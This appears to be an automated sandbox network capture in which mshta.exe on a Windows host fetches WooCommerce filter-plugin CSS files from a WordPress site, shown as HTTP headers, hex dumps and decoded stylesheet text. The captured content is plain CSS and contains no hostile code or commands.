                                                                                                                                                                                          2024-10-27 06:35:10 UTC484OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:10 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:10 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 57
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-39"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:10 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:10 UTC57INData Raw: 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 73 61 6c 65 73 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 3b 0a 7d
                                                                                                                                                                                          Data Ascii: .woof_checkbox_sales_container{ margin-bottom: 4px;}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          8192.168.2.449738185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:10 UTC483OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:10 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:10 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 4975
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-136f"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:10 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:10 UTC4975INData Raw: 2e 77 6f 6f 66 5f 74 65 78 74 5f 73 65 61 72 63 68 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 66 5f 74 65 78 74 5f 73 65 61 72 63 68 5f 67 6f 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 32 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 22 2e 2e 2f 69 6d 67 2f 6d 61 67 6e 69 66 79 69 6e 67 2d 67 6c 61 73 73 32 2e 73 76 67 22 29 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 20 21
                                                                                                                                                                                          Data Ascii: .woof_text_search_container .woof_text_search_go{ display: block; width: 20px; height: 20px; margin-left: 3px; background: url("../img/magnifying-glass2.svg"); display: none; border: none !important; text-decoration: none !


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          9192.168.2.449739185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:11 UTC485OUTGET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:11 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:11 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 1256
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-4e8"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:11 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:11 UTC1256INData Raw: 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 3a 68 6f 76 65 72 2c 0a 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 2e 63 68 65 63 6b 65 64 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 34 39 35 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 33 34 34 39 35 65 3b 0a 7d 0a 0a 0a 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 70 78 3b 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 0a
                                                                                                                                                                                          Data Ascii: .woof_list_label li .woof_label_term:hover,.woof_list_label li .woof_label_term.checked { background-color: #34495e; border-color: #34495e;}.woof_list_label li { display: inline-block !important; margin: 2px; vertical-align: top;


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          10192.168.2.449740185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:11 UTC488OUTGET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:12 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:11 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 4701
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-125d"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:11 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:12 UTC4701INData Raw: 2e 77 6f 6f 66 5f 71 75 69 63 6b 5f 73 65 61 72 63 68 5f 77 72 61 70 65 72 20 2e 65 61 73 79 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 77 6f 6f 66 5f 71 75 69 63 6b 5f 73 65 61 72 63 68 5f 77 72 61 70 65 72 20 69 6e 70 75 74 23 77 6f 6f 66 5f 71 75 69 63 6b 5f 73 65 61 72 63 68 5f 66 6f 72 6d 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0a 7d 0a 2e 77 6f 6f 66 5f 71 74 5f 6b 65 79 5f 77 6f 72 64 73 7b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 69 74 69 61 6c 3b 0a 7d 0a 2e 65 61 73 79 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 66
                                                                                                                                                                                          Data Ascii: .woof_quick_search_wraper .easy-autocomplete{ width: 100% !important;}.woof_quick_search_wraper input#woof_quick_search_form{ width: 100%; min-width: 250px;}.woof_qt_key_words{ line-height: initial;}.easy-autocomplete-container .woof


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          11192.168.2.449741185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:12 UTC511OUTGET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:12 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:12 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 3138
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-c42"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:12 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:12 UTC3138INData Raw: 2f 2a 20 68 74 74 70 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 65 6c 6d 61 68 64 69 6d 2f 70 65 6e 2f 68 6c 6d 72 69 20 2a 2f 0a 64 6c 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 0a 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 64 64 2c 0a 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 64 74 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 75 6c 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 2d 31 70 78 20 30 20 30 20 30 3b 0a 7d 0a 0a
                                                                                                                                                                                          Data Ascii: /* http://codepen.io/elmahdim/pen/hlmri */dl.woof_select_radio_check{ margin: 0 !important;}.woof_select_radio_check dd,.woof_select_radio_check dt { margin: 0px; padding: 0px;}.woof_select_radio_check ul { margin: -1px 0 0 0;}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          12192.168.2.449742185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:12 UTC495OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:13 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:13 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 9449
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-24e9"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:13 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:13 UTC9449INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 77 69 64 74 68 3a 20 32 35 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 73 70 61 63 65 3a 20 31 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 73 70 61 63 65 5f 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 74 65 78 74 5f 74 6f 70 3a 20 30 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 74 65 78 74 5f 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 68 5f 68 6f 76 65 72 5f 74 65 78 74
                                                                                                                                                                                          Data Ascii: :root { --woof-sd-ie-ch_width: 25px; --woof-sd-ie-ch_height: 25px; --woof-sd-ie-ch_space: 1px; --woof-sd-ie-ch_space_color: #ffffff; --woof-sd-ie-ch_text_top: 0; --woof-sd-ie-ch_text_color: #6d6d6d; --woof-sd-ie-ch_hover_text


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          13192.168.2.449743185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:13 UTC492OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:14 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:14 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 9373
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-249d"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:14 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:14 UTC9373INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 77 69 64 74 68 3a 20 32 35 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 73 70 61 63 65 3a 20 31 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 73 70 61 63 65 5f 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 74 65 78 74 5f 74 6f 70 3a 20 30 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 74 65 78 74 5f 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 72 61 64 5f 68 6f 76
                                                                                                                                                                                          Data Ascii: :root { --woof-sd-ie-rad_width: 25px; --woof-sd-ie-rad_height: 25px; --woof-sd-ie-rad_space: 1px; --woof-sd-ie-rad_space_color: #ffffff; --woof-sd-ie-rad_text_top: 0; --woof-sd-ie-rad_text_color: #6d6d6d; --woof-sd-ie-rad_hov


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          14192.168.2.449744185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:14 UTC495OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:14 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:14 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 8973
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-230d"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:14 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:14 UTC8973INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 37 39 62 38 66 66 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 69 6d 61 67 65 3a 20 75 72 6c 28 29 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 6f 72 64 65 72 5f 63 6f 6c 6f 72 3a 20 23 37 39 62 38 66 66 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 6f 72 64 65 72 5f 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 77 5f 76 65 72 74 65 78
                                                                                                                                                                                          Data Ascii: :root { --woof-sd-ie-sw_vertex_enabled_bg_color: #79b8ff; --woof-sd-ie-sw_vertex_enabled_bg_image: url(); --woof-sd-ie-sw_vertex_enabled_border_color: #79b8ff; --woof-sd-ie-sw_vertex_enabled_border_style: solid; --woof-sd-ie-sw_vertex


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          15192.168.2.449745185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:15 UTC492OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:15 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:15 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 5745
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-1671"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:15 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:15 UTC5745INData Raw: 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 77 69 64 74 68 3a 20 36 30 70 78 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 68 65 69 67 68 74 3a 20 36 30 70 78 3b 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 73 68 6f 77 5f 74 6f 6f 6c 74 69 70 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 73 68 6f 77 5f 74 6f 6f 6c 74 69 70 5f 63 6f 75 6e 74 3a 20 62 6c 6f 63 6b 2d 69 6e 6c 69 6e 65 3b 0a 0a 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6c 72 5f 69 6d 61 67 65 3a 20 75 72 6c 28 29 3b 0a 20 20 20 20 2d 2d 77
                                                                                                                                                                                          Data Ascii: :root { --woof-sd-ie-clr_width: 60px; --woof-sd-ie-clr_height: 60px; --woof-sd-ie-clr_show_tooltip: none; --woof-sd-ie-clr_show_tooltip_count: block-inline; --woof-sd-ie-clr_color: #000000; --woof-sd-ie-clr_image: url(); --w


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          16192.168.2.449746185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:15 UTC485OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:15 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
